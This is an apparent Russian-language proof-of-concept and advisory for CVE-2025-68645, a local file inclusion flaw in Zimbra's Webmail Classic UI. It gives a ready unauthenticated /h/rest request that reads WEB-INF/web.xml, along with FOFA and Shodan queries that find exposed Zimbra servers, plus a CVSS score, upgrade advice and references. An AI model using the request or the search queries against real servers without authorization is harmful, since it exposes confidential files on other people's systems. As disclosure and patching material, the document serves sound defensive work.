
CVE-2025-68645 - Уязвимость локального включения файлов (LFI) в Webmail Classic UI Zimbra Collaboration
Доказательство концепции, эксплуатирующее уязвимость локального включения файлов (Local File Inclusion, LFI), существующую в классическом веб-интерфейсе Webmail Classic UI Zimbra Collaboration (ZCS) 10.0 и 10.1 из-за некорректной обработки предоставленных пользователем параметров запроса в сервлете RestFilter.
Уязвимость возникает из-за недостаточной проверки входных данных в сервлете RestFilter. Неаутентифицированный удаленный злоумышленник может сформировать запросы к конечной точке /h/rest, чтобы повлиять на внутреннюю диспетчеризацию запросов, что позволяет включить произвольные файлы из каталога WebRoot.
http://127.0.0.1/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml
О каталоге WebRoot в Zimbra: https://github.com/Zimbra/zm-web-client/tree/develop/WebRoot
Nuclei-Template:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-68645.yaml
FOFA:
((title="Zimbra Web Client Sign In") || (title="Zimbra 网络客户端登录"))
SHODAN:
http.title:"Zimbra Web Client Sign In"
Неаутентифицированный удаленный злоумышленник может включить произвольные файлы из каталога WebRoot, что потенциально может привести к раскрытию конфиденциальной информации.
Vector 3.x CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H / Базовый балл 3.x 8.80 / Серьезность 3.x ВЫСОКАЯ
Обновление до последней версии Zimbra Collaboration.
Рекомендуемые действия:
/h/resthttps://nvd.nist.gov/vuln/detail/CVE-2025-68645
https://wiki.zimbra.com/wiki/Security_Center
https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
https://x.com/sirifu4k1/status/2006031417088639064
Этот инструмент предназначен только для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам противозаконен.